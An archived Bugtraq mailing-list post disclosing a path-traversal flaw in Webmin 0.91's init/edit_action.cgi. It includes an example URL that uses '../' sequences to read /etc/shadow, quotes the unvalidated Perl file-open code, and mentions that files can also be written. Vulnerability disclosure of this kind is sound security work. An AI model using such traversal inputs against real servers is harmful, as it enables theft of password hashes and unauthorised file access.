|
Bugtraq
mailing list archives
webmin 0.91 ../.. problem
From: aramos () aramos-test prisacom int (A. Ramos)
Date: Mon, 17 Dec 2001 16:05:05 +0100
Hello,
I find bug on webmin 0.91.
From web:
<snip>
What is Webmin?
Webmin is a web-based interface for system administration for Unix. Using any browser that supports tables and forms
(and Java for the File Manager module), you can setup user accounts, Apache, DNS, file sharing and so on.
Webmin consists of a simple web server, and a number of CGI programs which directly update system files like
/etc/inetd.conf and /etc/passwd. The web server and all CGI programs are written in Perl version 5, and use no
non-standard Perl modules.
</snip>
With this software you can start and stop services with simple user, and edit init scripts.
like this: http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+makedev
but you can use this:
http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+../../../../../etc/shadow
The problem reside on init/edit_action.cgi:
<snip>
open(FILE, $file);
while(<FILE>) {
$data .= $_;
if (/^\s*(['"]?)([a-z]+)\1\)/i) {
$hasarg{$2}++;
}
}
close(FILE);
</snip>
To fix, use your favorite regexp.
Yes, you can save file on server...
--
Prisacom
A. Ramos mailto:aramos () prisacom com
Dpto. Admin. Sistemas
--
 By Date 
By Thread
Current thread:
- webmin 0.91 ../.. problem A. Ramos (Dec 17)
|
Intro
